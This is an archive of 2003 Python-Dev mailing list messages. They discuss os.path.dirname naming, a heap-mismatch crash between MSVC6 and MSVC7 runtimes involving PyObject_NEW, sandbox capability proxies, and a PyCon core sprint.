In-Reply-To: <200303121704.h2CH4jn00404@odiug.zope.com>
Message-ID: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>

> From: Guido van Rossum
>
> > I'm not sure whether to classify this as a bug or a feature request.
> > Recently, I got burned by the fact that despite the name, dirname()
> > does not return the expected directory portion of a path if you pass
> > it a directory, instead it will return the parent directory because
> > it uses split.
>
> This is the first time I've ever heard of this confusion.  dirname is
> named after the Unix shell function of the same name, which behaves
> the same way.

Well that's news. I never heard of or used dirname in the shell. But with
that historical context it makes more sense now.

> I'm not even sure I understand what you expected -- you expected
> dirname("foo") to return "foo" if foo is a directory?  What would be
> the point of that?

Yes, I expected to get the directory passed in based on the function name.
In the code in question I don't know whether the path is a directory or a
file when I call dirname. I was simply misled by the function name. Looking
at this further I can see that I'm just going to have to create my own
directory(path) function because of how os.path.split behaves which impacts
dirname, I definitely need an isdir() check.

>>> os.path.split('c:\\mypython\\bugs\\')
('c:\\mypython\\bugs', '')
>>> os.path.split('c:\\mypython\\bugs')
('c:\\mypython', 'bugs')

Hmm, I may actually switch to using split(path)[0] and split(path)[-1] (or
split(path)[1]) in some cases since those might be more descriptive of what
dirname and basename actually do. Pity the functions aren't named
os.path.head and os.path.tail.

Sorry for the confusion,

ka


From pedronis@bluewin.ch  Wed Mar 12 17:53:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Wed, 12 Mar 2003 18:53:21 +0100
Subject: about candy [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com> <008001c2e70f$f514c520$6d94fea9@newmexico> <007a01c2e8b4$1092ab00$6d94fea9@newmexico>
Message-ID: <031001c2e8c0$45a066a0$6d94fea9@newmexico>

[me]
> attached is a modified version of s.py that takes a filename for the code to
> run inside the RestrictedInterpreter. Also myfunc is now myexc_source . There
> is also a new function candy, next mail on that.

Consider from s.py:

-- * --
from sys import exit
...

def candy(s):
  if s == "yes":
    return 'candy'
  else:
    return 'none'

ri = RestrictedInterpreter()

ri.globals['candy'] = ProxyFactory(candy)
...

ri.ri_exec(code)

print "OK"
-- * --

No unproxied exceptions, on the other hand both rexec and the prototype
RestrictedIntrepreter supply code with globals() [!], and apply() ...

I have some _even more baroque_ code (xpl2) that exploits candy  and manages to
call sys.exit:

...>\usr\python22\python -i s.py xpl2
candy
Got sys.exit

...>

In this case xpl2 could be rewritten as a single expression of the form:

candy(...)

although that would make for a totally masochistic exercise and a total
obfuscated python entry. No, I haven't done/ tried that :)

regards.


From dave@boost-consulting.com  Wed Mar 12 18:03:35 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 13:03:35 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 12:15:21 -0500")
References: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net>
Message-ID: <u8yvk798o.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [Guido]
>> You can read the source code as well as I can.
>
> Possibly, but not as well as I can <wink> -- the memory API's
> implementation is monumentally convoluted, especially before 2.3.
> Speaking of which, David, which version of Python was "someone"
> using?  

I was the one who discovered the problem, using Python 2.2.2.
Curiously, "someone" missed it because he was using vc6 instead of
vc7.

> Did they enable pymalloc?  

I don't think I did that.  I don't exactly know what pymalloc is.

> Did they give you a traceback (showing from where free() was
> called)?  

I can get one for you.  Here:

>	MSVCRTD.DLL!_free_dbg_lk(void * pUserData=0x00c46338, int nBlockUse=1)  Line 1044 + 0x30	C
 	MSVCRTD.DLL!_free_dbg(void * pUserData=0x00c46338, int nBlockUse=1)  Line 1001 + 0xd	C
 	MSVCRTD.DLL!free(void * pUserData=0x00c46338)  Line 956 + 0xb	C
 	python22_d.dll!_PyObject_Del(_object * op=0x00c46338)  Line 146 + 0xa	C
 	opaque_ext_d.pyd!dealloc(_object * self=0x00c46338)  Line 12 + 0xa	C++
 	python22_d.dll!_Py_Dealloc(_object * op=0x00c46338)  Line 1837 + 0x7	C
 	python22_d.dll!tupledealloc(PyTupleObject * op=0x0093c9a8)  Line 147 + 0x70	C
 	python22_d.dll!_Py_Dealloc(_object * op=0x0093c9a8)  Line 1837 + 0x7	C
 	python22_d.dll!do_call(_object * func=0x00c45e00, _object * * * pp_stack=0x0012edf8, int na=1, int nk=0)  Line 3273 + 0x43	C
 	python22_d.dll!eval_frame(_frame * f=0x008c2e68)  Line 2038 + 0x1e	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8, _object * * args=0x00000000, int argcount=0, _object * * kws=0x00000000, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!PyEval_EvalCode(PyCodeObject * co=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8)  Line 486 + 0x1f	C
 	python22_d.dll!exec_statement(_frame * f=0x008efbf0, _object * prog=0x00963068, _object * globals=0x008e65a8, _object * locals=0x008e65a8)  Line 3668 + 0x11	C
 	python22_d.dll!eval_frame(_frame * f=0x008efbf0)  Line 1482 + 0x15	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008c79a8, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x00965a7c, int argcount=7, _object * * kws=0x00965a98, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095cc98, _object * * * pp_stack=0x0012f268, int n=7, int na=7, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00965900)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008c6fd8, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008d8c64, int argcount=5, _object * * kws=0x008d8c78, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x009551a8, _object * * * pp_stack=0x0012f494, int n=5, int na=5, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008d8af0)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008cee50, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008c75d8, int argcount=5, _object * * kws=0x008c75ec, int kwcount=0, _object * * defs=0x0092d7a4, int defcount=3, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x00955220, _object * * * pp_stack=0x0012f6c0, int n=5, int na=5, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008c7450)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008ddba0, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x0089582c, int argcount=3, _object * * kws=0x00895838, int kwcount=0, _object * * defs=0x0092e2cc, int defcount=1, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095a850, _object * * * pp_stack=0x0012f8ec, int n=3, int na=3, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x008956a8)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008e3848, _object * globals=0x008e5940, _object * locals=0x00000000, _object * * args=0x008787f4, int argcount=1, _object * * kws=0x008787f8, int kwcount=0, _object * * defs=0x0092eaa4, int defcount=5, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x0095e620, _object * * * pp_stack=0x0012fb18, int n=1, int na=1, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00878690)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x008ce618, _object * globals=0x0086f780, _object * locals=0x00000000, _object * * args=0x008777bc, int argcount=0, _object * * kws=0x008777bc, int kwcount=0, _object * * defs=0x0084e56c, int defcount=1, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!fast_function(_object * func=0x008736e8, _object * * * pp_stack=0x0012fd44, int n=0, int na=0, int nk=0)  Line 3173 + 0x41	C
 	python22_d.dll!eval_frame(_frame * f=0x00877660)  Line 2035 + 0x25	C
 	python22_d.dll!PyEval_EvalCodeEx(PyCodeObject * co=0x0084d8a8, _object * globals=0x0086f780, _object * locals=0x0086f780, _object * * args=0x00000000, int argcount=0, _object * * kws=0x00000000, int kwcount=0, _object * * defs=0x00000000, int defcount=0, _object * closure=0x00000000)  Line 2595 + 0x9	C
 	python22_d.dll!PyEval_EvalCode(PyCodeObject * co=0x0084d8a8, _object * globals=0x0086f780, _object * locals=0x0086f780)  Line 486 + 0x1f	C
 	python22_d.dll!run_node(_node * n=0x0088e730, char * filename=0x00842def, _object * globals=0x0086f780, _object * locals=0x0086f780, PyCompilerFlags * flags=0x0012ff38)  Line 1079 + 0x11	C
 	python22_d.dll!run_err_node(_node * n=0x0088e730, char * filename=0x00842def, _object * globals=0x0086f780, _object * locals=0x0086f780, PyCompilerFlags * flags=0x0012ff38)  Line 1066 + 0x19	C
 	python22_d.dll!PyRun_FileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int start=257, _object * globals=0x0086f780, _object * locals=0x0086f780, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 1057 + 0x19	C
 	python22_d.dll!PyRun_SimpleFileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 686 + 0x22	C
 	python22_d.dll!PyRun_AnyFileExFlags(_iobuf * fp=0x10261888, char * filename=0x00842def, int closeit=1, PyCompilerFlags * flags=0x0012ff38)  Line 495 + 0x15	C
 	python22_d.dll!Py_Main(int argc=2, char * * argv=0x00842db8)  Line 367 + 0x30	C
 	python_d.exe!main(int argc=2, char * * argv=0x00842db8)  Line 10 + 0xd	C
 	python_d.exe!mainCRTStartup()  Line 338 + 0x11	C
 	kernel32.dll!77e814c7() 	


> Was it even freeing a Python object at the time?  

Yup.

> In what code base did someone make this substitution (e.g., Python
> core, Boost sources, someone's own extension module, someone else's
> extension module)?

Boost sources

> The straight answer to your question is no.  A nastier answer is
> that many memory mgmt screwups are shy, and can be triggered by
> seemingly irrelevant changes.

Both answers seem to amount to "'someone' must have a bug in his
code".  Am I reading that correctly?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 18:18:29 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 13:18:29 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <u8yvk798o.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>

[David Abrahams]
> I was the one who discovered the problem, using Python 2.2.2.
> Curiously, "someone" missed it because he was using vc6 instead of
> vc7.

So you were using VC7.  If so, using it for what?  Every stick of code in
question, or were you mixing VC7-compiled code with VC6-compiled code?  If
the latter, talk to Microsoft (by most accounts their runtime support
libraries aren't compatible with each other).

[traceback freeing a tuple]

> Both answers seem to amount to "'someone' must have a bug in his
> code".  Am I reading that correctly?

Yes, for the right meaning of "someone".  Possibilities beyond you include
Python and Microsoft.  Best guess I can make based on what you haven't told
us yet is that you were mixing the released Python 2.2.2 Windows core DLL
(built with MSVC6) with extension code using MSVC7 C runtime libraries.
Right or wrong?


From dave@boost-consulting.com  Wed Mar 12 18:42:53 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 13:42:53 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:18:29 -0500")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
Message-ID: <uvfyo5suq.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> I was the one who discovered the problem, using Python 2.2.2.
>> Curiously, "someone" missed it because he was using vc6 instead of
>> vc7.
>
> So you were using VC7.  If so, using it for what?  Every stick of code in
> question, or were you mixing VC7-compiled code with VC6-compiled
> code?  

Python was compiled with vc6, the rest with vc7.  I test this
combination regularly and have never seen a problem.

> If the latter, talk to Microsoft (by most accounts their runtime
> support libraries aren't compatible with each other).

Sure, but that's only an issue if you are allocating resources in one
runtime lib and deallocating in another AFAIK.  There's nothing
beyond memory allocation going on here, and the type object in
question has a custom deallocator which goes to the same runtime that
allocated it.

>> Both answers seem to amount to "'someone' must have a bug in his
>> code".  Am I reading that correctly?
>
> Yes, for the right meaning of "someone".  Possibilities beyond you include
> Python and Microsoft.  Best guess I can make based on what you haven't told
> us yet is that you were mixing the released Python 2.2.2 Windows core DLL
> (built with MSVC6) with extension code using MSVC7 C runtime libraries.
> Right or wrong?

Totally and absolutely right.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 18:57:34 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 13:57:34 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyo5suq.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net>

[David Abrahams]
> Python was compiled with vc6, the rest with vc7.  I test this
> combination regularly and have never seen a problem.

You have now <wink>.

> Sure, but that's only an issue if you are allocating resources in one
> runtime lib and deallocating in another AFAIK.  There's nothing
> beyond memory allocation going on here, and the type object in
> question has a custom deallocator which goes to the same runtime that
> allocated it.

See my later msg -- returning memory to a heap it wasn't obtained from is
fatal enough.  The object memory itself is in question here, not memory
allocated *by* the object.  Look at the traceback you sent if the
distinction isn't clear.


From dave@boost-consulting.com  Wed Mar 12 19:08:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 14:08:00 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:49:22 -0500")
References: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net>
Message-ID: <uk7f45rov.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

> Question:  I don't have VC7 and don't know what it does.  The traceback
> ended in MSVCRTD.DLL, which I recognize as MS's debug-mode C runtime DLL for
> VC6.  Does VC7 use the same DLL name, or some other DLL name?  

The same one.

> If the latter, my theory is that PyObject_New used the MSVC6 malloc,
> but that PyObject_NEW used the MSCV7 malloc (due to macro expansion
> in your code).  

Brilliant theory!

> In both cases the MSVC6 free() gets called.  

Ah, correct.  I misread "someone's" code; the delete function just
calls PyObject_Del().  I think "someone" probably ought to do
something more explicit to control where things are allocated/freed.
But for now, I think using PyObject_New/PyObject_Del is reasonable.

> But the MSVC6 and MSVC7 heaps are distinct, so the debug-mode MSVC6
> free() complains because it wasn't the source of the memory getting
> freed.  A missing piece of the puzzle: what was the error msg at the
> time this thing died?

unhandled exception at 0x10213638 (MSVCRTD.DLL) in python_d.exe: User
breakpoint.

It seems to me that in light of all this, it's probably worth noting
this difference between PyObject_New and PyObject_NEW in the docs.
People *will* develop extension modules with different compilers from
the one Python was compiled with... I know, submit a patch.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Wed Mar 12 19:09:17 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 14:09:17 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 13:57:34 -0500")
References: <LNBBLJKPBEHFEDALKOLCCELPEAAB.tim.one@comcast.net>
Message-ID: <uhea85rmq.fsf@boost-consulting.com>

Tim Peters <tim.one@comcast.net> writes:

>> Sure, but that's only an issue if you are allocating resources in one
>> runtime lib and deallocating in another AFAIK.  There's nothing
>> beyond memory allocation going on here, and the type object in
>> question has a custom deallocator which goes to the same runtime that
>> allocated it.
>
> See my later msg -- returning memory to a heap it wasn't obtained from is
> fatal enough.  

I think that's exactly what I said.

> The object memory itself is in question here, not memory
> allocated *by* the object.  

I think that's also exactly what I thought.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tim.one@comcast.net  Wed Mar 12 19:26:22 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 14:26:22 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uk7f45rov.fsf@boost-consulting.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>

[David Abrahams]
> ...
> It seems to me that in light of all this, it's probably worth noting
> this difference between PyObject_New and PyObject_NEW in the docs.

I don't think the macro versions should ever be used outside the core.
Inside the core, it's safe.  So I think the "doc bug" is that the docs
mention PyObject_NEW at all.

> People *will* develop extension modules with different compilers from
> the one Python was compiled with...

Yup.

> I know, submit a patch.

That would be a sociable thing.


From skip@pobox.com  Wed Mar 12 19:40:10 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 13:40:10 -0600
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uk7f45rov.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCOELNEAAB.tim.one@comcast.net>
 <uk7f45rov.fsf@boost-consulting.com>
Message-ID: <15983.36122.138471.586434@montanaro.dyndns.org>

    David> But for now, I think using PyObject_New/PyObject_Del is
    David> reasonable.

Or perhaps PyObject_NEW/PyObject_DEL.

S


From theller@python.net  Wed Mar 12 19:52:47 2003
From: theller@python.net (Thomas Heller)
Date: 12 Mar 2003 20:52:47 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
Message-ID: <7kb4z7jk.fsf@python.net>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
> > ...
> > It seems to me that in light of all this, it's probably worth noting
> > this difference between PyObject_New and PyObject_NEW in the docs.
> 
> I don't think the macro versions should ever be used outside the core.
> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> mention PyObject_NEW at all.
> 

Better to expl�citely warn about them with a wording similar to that
from the section 9.2 Memory Interface:

  In addition, the following macro sets are provided for calling the
  Python memory allocator directly, without involving the C API
  functions listed above. However, note that their use does not preserve
  binary compatibility accross Python versions [] and is therefore
  deprecated in extension modules.

Maybe 'and compilers' should be inserted between the [].

Thomas


From greg@cosc.canterbury.ac.nz  Wed Mar 12 21:27:31 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 10:27:31 +1300 (NZDT)
Subject: How long is your shopping tuple? (Re: [Python-Dev] Ridiculously minor tweaks?)
In-Reply-To: <3E6EABEE.2040108@tismer.com>
Message-ID: <200303122127.h2CLRVZ02250@oma.cosc.canterbury.ac.nz>

Guido:
> Tuples are for heterogeneous data, list are for homogeneous data.
> Tuples are *not* read-only lists.

Weird things are happening in my brain this morning. After
reading this thread, I was replying to something unrelated
and had the occasion to use the phrase "It's on my list"...
and I briefly wondered whether I should use the word
"tuple" instead!

Somehow "It's on my tuple" doesn't have quite the same
ring to it. So, yes, tuples ARE different from lists...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Wed Mar 12 21:29:25 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 10:29:25 +1300 (NZDT)
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <3E6F5F48.7040001@algroup.co.uk>
Message-ID: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>

Ben Laurie <ben@algroup.co.uk>:

> If I understand them correctly, a Zope proxy where the security checker 
> always says "yes" is a capability. Except, possibly, they may be 
> forgeable, I don't know them well enough to know.

A security checker that could be easily forged wouldn't
be very, er, secure, would it?-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Wed Mar 12 21:33:50 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 12 Mar 2003 22:33:50 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uvfyo5suq.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
Message-ID: <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Sure, but that's only an issue if you are allocating resources in one
> runtime lib and deallocating in another AFAIK.  

No. You also cannot pass struct FILE* from one C library to the other;
file locking will then crash.

Regards,
Martin


From brett@python.org  Wed Mar 12 21:36:59 2003
From: brett@python.org (Brett Cannon)
Date: Wed, 12 Mar 2003 13:36:59 -0800 (PST)
Subject: [Python-Dev] Care to sprint on the core at PyCon?
Message-ID: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>

Four members of PythonLabs will be at the pre-PyCon sprint (more info on
sprints at http://www.python.org/cgi-bin/moinmoin/SprintPlan ) running one
for the Python core.  If you would like to attend, email me at
brett@python.org to say so.  You must be registered for PyCon to be able
to attend.  And please do this ASAP so we can get the ball rolling on this
and lock down who will be there.

And regardless whether you care to attend or not, please look at
http://www.python.org/cgi-bin/moinmoin/PyCoreSprint and make suggestions
on what the group should sprint on.

-Brett


From jeremy@zope.com  Wed Mar 12 21:43:38 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 12 Mar 2003 16:43:38 -0500
Subject: [Python-Dev] Care to sprint on the core at PyCon?
In-Reply-To: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.53.0303121309340.3308@death.OCF.Berkeley.EDU>
Message-ID: <1047505418.21994.150.camel@slothrop.zope.com>

On Wed, 2003-03-12 at 16:36, Brett Cannon wrote:
> Four members of PythonLabs will be at the pre-PyCon sprint (more info on
> sprints at http://www.python.org/cgi-bin/moinmoin/SprintPlan ) running one
> for the Python core.  If you would like to attend, email me at
> brett@python.org to say so.  You must be registered for PyCon to be able
> to attend.  And please do this ASAP so we can get the ball rolling on this
> and lock down who will be there.

Thanks for taking this up!  There is still some room for sprinters.

> And regardless whether you care to attend or not, please look at
> http://www.python.org/cgi-bin/moinmoin/PyCoreSprint and make suggestions
> on what the group should sprint on.

I would like to do some sprinting on the ast branch, which I noted in
the wiki.

Jeremy


From dave@boost-consulting.com  Wed Mar 12 22:15:12 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 17:15:12 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "12 Mar 2003 22:33:50 +0100")
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
Message-ID: <u65qo5j0v.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. L=F6wis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Sure, but that's only an issue if you are allocating resources in one
>> runtime lib and deallocating in another AFAIK.=20=20
>
> No. You also cannot pass struct FILE* from one C library to the other;
> file locking will then crash.

A file is a resource.

--=20
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From greg@cosc.canterbury.ac.nz  Thu Mar 13 01:51:27 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 13 Mar 2003 14:51:27 +1300 (NZDT)
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>
Message-ID: <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>

Kevin Altis <altis@semi-retired.com>:

> Pity the functions aren't named
> os.path.head and os.path.tail.

It wouldn't be entirely clear what they mean even then --
"head" might mean just the first pathname component.

In a tool I wrote some years ago in Scheme, I called
them "filename-directory" and "filename-nondirectory".
Which suffered from the same problem, really (they
didn't consult the file system either). But it didn't
matter, since I was the only person who used them,
and *I* knew what they meant. :-)

Maybe they should be called 
"all_except_the_last_pathname_component"
and "last_pathname_component"?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From skip@pobox.com  Thu Mar 13 03:38:43 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 21:38:43 -0600
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>
References: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>
 <200303130151.h2D1pRf09895@oma.cosc.canterbury.ac.nz>
Message-ID: <15983.64835.715338.915063@montanaro.dyndns.org>

    Greg> Kevin Altis <altis@semi-retired.com>:
    >> Pity the functions aren't named os.path.head and os.path.tail.

    Greg> It wouldn't be entirely clear what they mean even then -- "head"
    Greg> might mean just the first pathname component.
    ...
    Greg> Maybe they should be called
    Greg> "all_except_the_last_pathname_component" and
    Greg> "last_pathname_component"?

I know, how about car and cdr? ;-)

Skip


From martin@v.loewis.de  Thu Mar 13 07:46:13 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 13 Mar 2003 08:46:13 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <u65qo5j0v.fsf@boost-consulting.com>
References: <LNBBLJKPBEHFEDALKOLCEELLEAAB.tim.one@comcast.net>
 <uvfyo5suq.fsf@boost-consulting.com>
 <m31y1c6zi9.fsf@mira.informatik.hu-berlin.de>
 <u65qo5j0v.fsf@boost-consulting.com>
Message-ID: <m31y1bbtfe.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> martin@v.loewis.de (Martin v. L=C2=8E=C3=B6wis) writes:
>=20
> > David Abrahams <dave@boost-consulting.com> writes:
> >
> >> Sure, but that's only an issue if you are allocating resources in one
> >> runtime lib and deallocating in another AFAIK.=20=20
> >
> > No. You also cannot pass struct FILE* from one C library to the other;
> > file locking will then crash.
>=20
> A file is a resource.

Yes, but printf is neither allocation nor deallocation.

Regards,
Martin


From ben@algroup.co.uk  Thu Mar 13 10:47:59 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 13 Mar 2003 10:47:59 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>
References: <200303122129.h2CLTPq02277@oma.cosc.canterbury.ac.nz>
Message-ID: <3E7061DF.8020207@algroup.co.uk>

Greg Ewing wrote:
> Ben Laurie <ben@algroup.co.uk>:
> 
> 
>>If I understand them correctly, a Zope proxy where the security checker 
>>always says "yes" is a capability. Except, possibly, they may be 
>>forgeable, I don't know them well enough to know.
> 
> 
> A security checker that could be easily forged wouldn't
> be very, er, secure, would it?-)

Its the proxy that needs to be unforgeable. And since their model is 
role-based, I assume its not a fundamental requirement for them.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From mwh@python.net  Thu Mar 13 11:02:31 2003
From: mwh@python.net (Michael Hudson)
Date: Thu, 13 Mar 2003 11:02:31 +0000
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net> (Tim
 Peters's message of "Wed, 12 Mar 2003 14:26:22 -0500")
References: <LNBBLJKPBEHFEDALKOLCAEMCEAAB.tim.one@comcast.net>
Message-ID: <2mvfynedh4.fsf@starship.python.net>

Tim Peters <tim.one@comcast.net> writes:

> [David Abrahams]
>> ...
>> It seems to me that in light of all this, it's probably worth noting
>> this difference between PyObject_New and PyObject_NEW in the docs.
>
> I don't think the macro versions should ever be used outside the core.
> Inside the core, it's safe.  So I think the "doc bug" is that the docs
> mention PyObject_NEW at all.

